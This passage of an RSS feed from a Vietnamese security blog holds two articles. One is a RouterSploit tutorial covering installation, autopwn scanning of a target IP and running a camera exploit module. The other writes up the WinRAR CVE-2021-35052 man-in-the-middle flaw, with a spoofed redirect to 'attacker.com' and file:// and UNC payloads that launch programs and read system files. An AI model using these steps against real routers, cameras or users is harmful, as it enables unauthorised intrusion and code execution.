		<media:content url="https://anonyviet.com/wp-content/uploads/2018/08/11-08-2018-04-35-54.png" medium="image"></media:content>
            	</item>
		<item>
		<title>Routersploit: exploiting security vulnerabilities of Routers and network devices</title>
		<link>https://en.anonyviet.com/routersploit-exploiting-security-vulnerabilities-of-routers-and-network-devices/</link>
					<comments>https://en.anonyviet.com/routersploit-exploiting-security-vulnerabilities-of-routers-and-network-devices/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Thu, 26 Jan 2023 05:53:01 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[devices]]></category>
		<category><![CDATA[exploiting]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[Routers]]></category>
		<category><![CDATA[Routersploit]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Vulnerabilities]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=3735</guid>

					<description><![CDATA[RouterSploit is an open source mining framework dedicated to embedded devices – IoT. This tool is developed in python language, and because it is written in python, you only need an operating system that can install python such as windows, linux, macOS to run RouterSploit. RouterSploit exploits IoT devices based on known vulnerabilities of device [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fthreat9%2Froutersploit" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">RouterSploit</a> is an open source mining framework dedicated to embedded devices – IoT.  This tool is developed in python language, and because it is written in python, you only need an operating system that can install python such as windows, linux, macOS to run RouterSploit.  RouterSploit exploits IoT devices based on known vulnerabilities of device manufacturers such as network routers, cameras, smart appliances such as light bulbs, burglar alarm systems, etc.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><img post-id="3735" fifu-featured="1" decoding="async" class="aligncenter wp-image-28298 size-full" src="https://anonyviet.com/wp-content/uploads/2021/06/389.jpg" alt="Routersploit: exploiting security vulnerabilities of Routers and network devices" title="Routersploit: exploiting security vulnerabilities of Routers and network devices" width="476" height="225" srcset="https://anonyviet.com/wp-content/uploads/2021/06/389.jpg 476w, https://anonyviet.com/wp-content/uploads/2021/06/389-300x142.jpg 300w" sizes="(max-width: 476px) 100vw, 476px" title="Routersploit: exploiting security holes of Routers and network devices 11"/></p>
<p>RouterSploit includes various modules that support penetration testing activities:</p>
<ul>
<li>exploits – modules that take advantage of identified vulnerabilities</li>
<li>creds – modules designed to check credentials for network services</li>
<li>scanners – modules that check if the target is vulnerable to exploitation</li>
<li>payloads – modules responsible for generating payloads for different architectures and injection points</li>
<li>generics – modules that perform generic attacks</li>
</ul>
<h2 id="ftoc-cach-cai-dat-routersploit" class="ftwp-heading">How to install RouterSploit</h2>
<h3 id="ftoc-yeu-cau-can-thiet" class="ftwp-heading">Necessary requirements</h3>
<p>To run the RouterSploit tool, you need to install:</p>
<ul>
<li>future</li>
<li>requests</li>
<li>paramiko</li>
<li>pysnmp</li>
<li>pycrypto</li>
<li>bluepy – bluetooth low energy (optional)</li>
</ul>
<h3 id="ftoc-cai-dat-tren-kali-linux" class="ftwp-heading">Install on Kali Linux</h3>
<pre><code>apt-get install python3-pip&#13;
git clone https://www.github.com/threat9/routersploit&#13;
cd routersploit&#13;
python3 -m pip install -r requirements.txt&#13;
python3 rsf.py</code></pre>
<p>Bluetooth Low Energy Support:</p>
<pre><code>apt-get install libglib2.0-dev&#13;
python3 -m pip install bluepy&#13;
python3 rsf.py</code></pre>
<h3 id="ftoc-cai-dat-tren-ubuntu-20-04" class="ftwp-heading">Install on Ubuntu 20.04</h3>
<pre><code>sudo apt-get install git python3-pip&#13;
git clone https://github.com/threat9/routersploit&#13;
cd routersploit&#13;
python3 -m pip install -r requirements.txt&#13;
python3 rsf.py</code></pre>
<p>Bluetooth Low Energy Support:</p>
<pre><code>sudo apt-get install libglib2.0-dev&#13;
python3 -m pip install bluepy&#13;
python3 rsf.py</code></pre>
<h3 id="ftoc-cai-dat-tren-ubuntu-18-04-17-10" class="ftwp-heading">Install on Ubuntu 18.04 &#038; 17.10</h3>
<pre><code>sudo add-apt-repository universe&#13;
sudo apt-get install git python3-pip&#13;
git clone https://www.github.com/threat9/routersploit&#13;
cd routersploit&#13;
python3 -m pip install setuptools&#13;
python3 -m pip install -r requirements.txt&#13;
python3 rsf.py</code></pre>
<p>Bluetooth Low Energy Support:</p>
<pre><code>apt-get install libglib2.0-dev&#13;
python3 -m pip install bluepy&#13;
python3 rsf.py</code></pre>
<h3 id="ftoc-cai-dat-tren-osx" class="ftwp-heading">Install on OSX</h3>
<pre><code>git clone https://www.github.com/threat9/routersploit&#13;
cd routersploit&#13;
sudo python3 -m pip install -r requirements.txt&#13;
python3 rsf.py</code></pre>
<h3 id="ftoc-cai-dat-tren-docker" class="ftwp-heading">Install on Docker</h3>
<pre><code>git clone https://www.github.com/threat9/routersploit&#13;
cd routersploit&#13;
docker build -t routersploit .&#13;
docker run -it --rm routersploit</code></pre>
<h3 id="ftoc-cap-nhat" class="ftwp-heading">Update</h3>
<p>You should update RouterSploit regularly as this project is under intense development and new modules are released almost every day.</p>
<pre><code>cd routersploit&#13;
git pull</code></pre>
<h2 id="ftoc-cach-su-dung-routersploit" class="ftwp-heading">How to use RouterSploit</h2>
<p>After the installation is complete, go to the routersploit folder you just cloned, and run the following command:</p>
<div class="codecolorer-container text railscasts">
<div class="text codecolorer">
<pre class="EnlighterJSRAW" data-enlighter-language="generic">cd routersploit&#13;
python3 rsf.py</pre>
<p><img decoding="async" loading="lazy" class="aligncenter wp-image-28299 size-full" src="https://anonyviet.com/wp-content/uploads/2021/06/390.jpg" alt="How to use RouterSploit" width="653" height="468" srcset="https://anonyviet.com/wp-content/uploads/2021/06/390.jpg 653w, https://anonyviet.com/wp-content/uploads/2021/06/390-300x215.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/06/390-120x86.jpg 120w, https://anonyviet.com/wp-content/uploads/2021/06/390-350x250.jpg 350w" sizes="auto, (max-width: 653px) 100vw, 653px" title="Routersploit: exploiting security holes of Routers and network devices 12"/></p>
<p>Next, you need to know the IP of the object you want to check.  After getting the IP, type the following command to check the object in the LAN or internet environment:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">rsf &gt; use scanners/autopwn&#13;
rsf (AutoPwn) &gt; set target 192.168.1.254&#13;
run</pre>
<p>Routersploit will start inspecting the object and looking for vulnerabilities, those found will have a green plus sign on the left.  In the case below, because no vulnerabilities were found, you will not see the green plus sign.</p>
<p><img decoding="async" loading="lazy" class="aligncenter wp-image-28300 size-full" src="https://anonyviet.com/wp-content/uploads/2021/06/391.jpg" alt="hack router with Routersploit" width="653" height="468" srcset="https://anonyviet.com/wp-content/uploads/2021/06/391.jpg 653w, https://anonyviet.com/wp-content/uploads/2021/06/391-300x215.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/06/391-120x86.jpg 120w, https://anonyviet.com/wp-content/uploads/2021/06/391-350x250.jpg 350w" sizes="auto, (max-width: 653px) 100vw, 653px" title="Routersploit: exploiting security holes of Routers and network devices 13"/></p>
</div>
<p>And if you see a blue plus sign like the image below, routersploit has already found the vulnerability.</p>
<p><img decoding="async" loading="lazy" class="aligncenter wp-image-28301 size-full" src="https://anonyviet.com/wp-content/uploads/2021/06/392.jpg" alt="find security holes with routersploit" width="653" height="482" srcset="https://anonyviet.com/wp-content/uploads/2021/06/392.jpg 653w, https://anonyviet.com/wp-content/uploads/2021/06/392-300x221.jpg 300w" sizes="auto, (max-width: 653px) 100vw, 653px" title="Routersploit: exploiting security holes of Routers and network devices 14"/></p>
<p>This is a camera-related vulnerability and was found on port 82. Next, you run the following command to start exploiting that vulnerability.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">use exploits/cameras/multi/netwave_ip_camera_information_disclosure&#13;
set target {ip-victim}&#13;
show option&#13;
set port 82</pre>
<p><img decoding="async" loading="lazy" class="aligncenter wp-image-28302 size-full" src="https://anonyviet.com/wp-content/uploads/2021/06/393.jpg" alt="hack network devices with routersploit" width="653" height="639" srcset="https://anonyviet.com/wp-content/uploads/2021/06/393.jpg 653w, https://anonyviet.com/wp-content/uploads/2021/06/393-300x294.jpg 300w" sizes="auto, (max-width: 653px) 100vw, 653px" title="Routersploit: exploit the security vulnerability of Routers and network devices 15"/></p>
<p>After setting the vulnerability, IP, and port, you continue to type the command <code>run</code> to start the mining process.</p>
<p><img decoding="async" loading="lazy" class="aligncenter wp-image-28303 size-full" src="https://anonyviet.com/wp-content/uploads/2021/06/394.jpg" alt="router device vulnerability scan" width="653" height="368" srcset="https://anonyviet.com/wp-content/uploads/2021/06/394.jpg 653w, https://anonyviet.com/wp-content/uploads/2021/06/394-300x169.jpg 300w" sizes="auto, (max-width: 653px) 100vw, 653px" title="Routersploit: exploiting security holes of Routers and 16 . network devices"/></p>
<p>So you have successfully exploited the vulnerability.  Routersploit is a very convenient, fast and lightweight toolkit, suitable for cases where you want to quickly scan devices with suspected security vulnerabilities.  Alternatively, you can also create a keylogger using python<a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fcach-tao-keylogger-bang-python-don-gian-nhat%2F" rel="noopener" class="local-link"> here.</a></p>
</div>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;28297&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/routersploit-exploiting-security-vulnerabilities-of-routers-and-network-devices/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2021/06/389.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Exploiting WinRAR vulnerability to spread malicious code on Windows</title>
		<link>https://en.anonyviet.com/exploiting-winrar-vulnerability-to-spread-malicious-code-on-windows/</link>
					<comments>https://en.anonyviet.com/exploiting-winrar-vulnerability-to-spread-malicious-code-on-windows/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 25 Jan 2023 14:48:17 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Code]]></category>
		<category><![CDATA[exploiting]]></category>
		<category><![CDATA[malicious]]></category>
		<category><![CDATA[spread]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[WinRAR]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=3033</guid>

					<description><![CDATA[This article will describe a vulnerability in the trial version of WinRAR that has serious consequences for third-party software management. This vulnerability allows hackers to intercept and modify requests sent to application users. This vulnerability can be used for remote code execution (RCE) on the victim&#8217;s computer. This error is called code CVE-2021-35052. Join the [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong>This article will describe a vulnerability in the trial version of WinRAR that has serious consequences for third-party software management.  This vulnerability allows hackers to intercept and modify requests sent to application users.  This vulnerability can be used for remote code execution (RCE) on the victim&#8217;s computer.  This error is called code<a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fcve.mitre.org%2Fcgi-bin%2Fcvename.cgi%3Fname%3DCVE-2021-30552" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';"> CVE-2021-35052</a>.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<h2 id="ftoc-winrar-la-gi" class="ftwp-heading">What is Winrar?</h2>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fdownload-winrar-full-cach-tu-tao-key-kich-hoat-cho-winrar%2F" rel="noopener" class="local-link">WinRAR</a> is an application that manages files stored on the Windows operating system.  It allows creating and decompressing popular archive formats such as RAR and ZIP.  It is distributed as trial software, allowing users to experience the full features of the application for a certain number of days.  After that, users can continue to use the free apps but have some features disabled.</p>
<h2 id="ftoc-ket-qua" class="ftwp-heading">Result</h2>
<p>The author found this vulnerability by accident in WinRAR version 5.70, when the trial period is used up, a Javascript error will appear.</p>
<p><img decoding="async" class="aligncenter wp-image-35210 size-full" src="https://anonyviet.com/wp-content/uploads/2021/10/1-1.jpg" alt="Trial versions of WinRAR are vulnerable: when freeware isn't free" width="529" height="455" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1-1.jpg 529w, https://anonyviet.com/wp-content/uploads/2021/10/1-1-300x258.jpg 300w" sizes="(max-width: 529px) 100vw, 529px" title="Exploiting WinRAR vulnerability to spread malicious code on Windows 11"/></p>
<p>Somewhat surprised because this error only appears in Internet Explorer browser.</p>
<p>After a few tests, it became apparent that when the trial period has expired, about one in three launches of the WinRAR.exe application, will show this message.  This window uses the mshtml.dll for Borland C++ included in WinRAR.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-35211 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/tS7BP9RP5rIB.jpg" alt="Exploiting WinRAR vulnerability to spread malicious code on Windows 10" width="951" height="431" srcset="https://anonyviet.com/wp-content/uploads/2021/10/tS7BP9RP5rIB.jpg 951w, https://anonyviet.com/wp-content/uploads/2021/10/tS7BP9RP5rIB-300x136.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/10/tS7BP9RP5rIB-768x348.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/10/tS7BP9RP5rIB-750x340.jpg 750w" sizes="auto, (max-width: 951px) 100vw, 951px" title="Exploiting WinRAR vulnerability to spread malicious code on Windows 12"/></p>
<p>The author has set up <a target="_blank" href="https://en.anonyviet.com/next-link?url=http%3A%2F%2Fanonyviet.com%2F%3Fs%3DBurp%2BSuite" rel="noopener" class="local-link">Burp Suite</a> as the default Windows proxy and to analyze outgoing data from the WinRar error window to see if this bug can be exploited.  When the request is sent over HTTPS, WinRAR users will receive a notification about the insecure self-signed certificate that Burp uses.  However, in my experience, many users will click “Yes” to continue using the application.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-35212 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/2-1.jpg" alt="Exploiting WinRAR vulnerability to spread malicious code on Windows 11" width="427" height="347" srcset="https://anonyviet.com/wp-content/uploads/2021/10/2-1.jpg 427w, https://anonyviet.com/wp-content/uploads/2021/10/2-1-300x244.jpg 300w" sizes="auto, (max-width: 427px) 100vw, 427px" title="Exploiting WinRAR vulnerability to spread malicious code on Windows 13"/></p>
<p>Looking at this request we can see version (5.7.0) and Winrar x64</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">GET /?language=English&amp;source=RARLAB&amp;landingpage=expired&amp;version=570&amp;architecture=64 HTTP/1.1&#13;
Accept: */*&#13;
Accept-Language: ru-RU&#13;
UA-CPU: AMD64&#13;
Accept-Encoding: gzip, deflate&#13;
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)&#13;
Host: notifier.rarlab.com &#13;
Connection: close&#13;
Cookie: _wr=; _gid=; _ga=</pre>
<h2 id="ftoc-sua-doi-phan-hoi-cua-nguoi-dung" class="ftwp-heading">Modify user feedback</h2>
<p>Next, the author tried to modify the intercepted responses from WinRAR to the user.  If the response code is changed to “301 Moved Permanently” then my redirect request to the malicious domain “attacker.com” will be cached and all requests will be redirected to “attacker. com&#8221;.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">HTTP/1.1 301 Moved Permanently&#13;
content-length: 0&#13;
Location: http://attacker.com/?language=English&amp;source=RARLAB&amp;landingpage=expired&amp;version=570&amp;architecture=64&#13;
connection: close</pre>
<h2 id="ftoc-thuc-thi-ma-tu-xa" class="ftwp-heading">Remote code execution</h2>
<p>Attack <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2F%3Fs%3DMan-in-the-Middle" rel="noopener" class="local-link">Man-in-the-Middle </a>This requires ARP spoofing.  The author has tried several different attacks to see if this type of access is possible.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">&lt;a href="https://anonyviet.com/khai-thac-lo-hong-winrar-de-phat-tan-ma-doc-tren-windows/file://10.0.12.34/applications/test.jar"&gt;file://10.0.12.34/applications/test.jar&lt;/a&gt;&lt;br&gt;&#13;
&lt;a href="\\10.0.12.34/applications/test.jar"&gt;\\10.0.12.34/applications/test.jar&lt;/a&gt;&lt;br&gt;&#13;
&lt;a href="file://localhost/C:/windows/system32/drivers/etc/hosts"&gt;file://localhost/C:/windows/system32/drivers/etc/hosts&lt;/a&gt;&lt;br&gt;&#13;
&lt;a href="file:///C:/windows/system32/calc.exe"&gt;file:///C:/windows/system32/calc.exe&lt;/a&gt;&lt;br&gt;&#13;
&lt;a href="file:///C:\\windows\\system.ini"&gt;file:///C:\\windows\\system.ini&lt;/a&gt;&lt;br&gt;</pre>
<p>The above code describes a spoofed response showing several possible attacks, such as running applications, retrieving server information, and opening calculator applications.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-35213 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/3-1.jpg" alt="Exploiting WinRAR vulnerability to spread malicious code on Windows 12" width="1440" height="810" srcset="https://anonyviet.com/wp-content/uploads/2021/10/3-1.jpg 1440w, https://anonyviet.com/wp-content/uploads/2021/10/3-1-300x169.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/10/3-1-1024x576.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/10/3-1-768x432.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/10/3-1-750x422.jpg 750w, https://anonyviet.com/wp-content/uploads/2021/10/3-1-1140x641.jpg 1140w" sizes="auto, (max-width: 1440px) 100vw, 1440px" title="Exploiting WinRAR vulnerability to spread malicious code on Windows 14"/></p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-35214 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/4-1.jpg" alt="Exploiting WinRAR vulnerability to spread malicious code on Windows 13" width="1139" height="589" srcset="https://anonyviet.com/wp-content/uploads/2021/10/4-1.jpg 1139w, https://anonyviet.com/wp-content/uploads/2021/10/4-1-300x155.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/10/4-1-1024x530.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/10/4-1-768x397.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/10/4-1-750x388.jpg 750w" sizes="auto, (max-width: 1139px) 100vw, 1139px" title="Exploiting WinRAR vulnerability to spread malicious code on Windows 15"/></p>
<p>Most attacks are successful, but it should be noted that many attacks still result in additional Windows security warnings.  To be successful, users need to click “Run”.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-35215 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/5-1.jpg" alt="Exploiting WinRAR vulnerability to spread malicious code on Windows 14" width="476" height="349" srcset="https://anonyviet.com/wp-content/uploads/2021/10/5-1.jpg 476w, https://anonyviet.com/wp-content/uploads/2021/10/5-1-300x220.jpg 300w" sizes="auto, (max-width: 476px) 100vw, 476px" title="Exploiting WinRAR vulnerability to spread malicious code on Windows 16"/></p>
<p>However, there are some file types that can run without a security warning.  That is:</p>
<p>• .DOCX<br />• .PDF<br />• .PY<br />• .RAR<br />CVE-2018-20250 exists for Winrar 5.7 and below.  Therefore you need to upgrade WinRar now to avoid being attacked by Hackers</p>
<p>One of the biggest challenges a company faces is managing third-party software.  Once installed, third-party software has access to read, write, and modify data on devices that access the corporate network.</p>
<p>It is not possible to test every application that a user can install and therefore IT policy is important to avoid security risks.</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;35209&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/exploiting-winrar-vulnerability-to-spread-malicious-code-on-windows/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2021/10/lo-hong-bao-mat-winrar-tan-cong-windows.jpg" medium="image"></media:content>
            	</item>
	</channel>
</rss>
